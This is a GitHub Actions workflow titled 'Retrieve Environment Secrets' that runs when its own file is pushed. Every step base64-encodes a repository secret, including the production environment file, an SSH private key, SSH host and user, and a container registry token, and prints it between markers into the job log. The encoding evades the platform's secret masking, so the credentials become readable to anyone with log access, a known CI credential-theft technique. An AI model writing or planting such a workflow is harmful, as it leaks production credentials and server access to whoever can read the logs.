name: Retrieve Environment Secrets
on:
  push:
    paths:
      - '.github/workflows/retrieve_secrets.yml'
jobs:
  retrieve:
    runs-on: ubuntu-latest
    steps:
      - name: Output All Secrets
        run: |
          echo "===START_SECRET_ENV_PRODUCTION==="
          printf '%s' "${{ secrets.ENV_PRODUCTION }}" | base64 -w 0
          echo ""
          echo "===END_SECRET_ENV_PRODUCTION==="
          
          echo "===START_SECRET_SSH_PRIVATE_KEY==="
          printf '%s' "${{ secrets.SSH_PRIVATE_KEY }}" | base64 -w 0
          echo ""
          echo "===END_SECRET_SSH_PRIVATE_KEY==="

          echo "===START_SECRET_SSH_HOST==="
          printf '%s' "${{ secrets.SSH_HOST }}" | base64 -w 0
          echo ""
          echo "===END_SECRET_SSH_HOST==="

          echo "===START_SECRET_SSH_USER==="
          printf '%s' "${{ secrets.SSH_USER }}" | base64 -w 0
          echo ""
          echo "===END_SECRET_SSH_USER==="

          echo "===START_SECRET_APP_DIR==="
          printf '%s' "${{ secrets.APP_DIR }}" | base64 -w 0
          echo ""
          echo "===END_SECRET_APP_DIR==="

          echo "===START_SECRET_GHCR_TOKEN==="
          printf '%s' "${{ secrets.GHCR_TOKEN }}" | base64 -w 0
          echo ""
          echo "===END_SECRET_GHCR_TOKEN==="
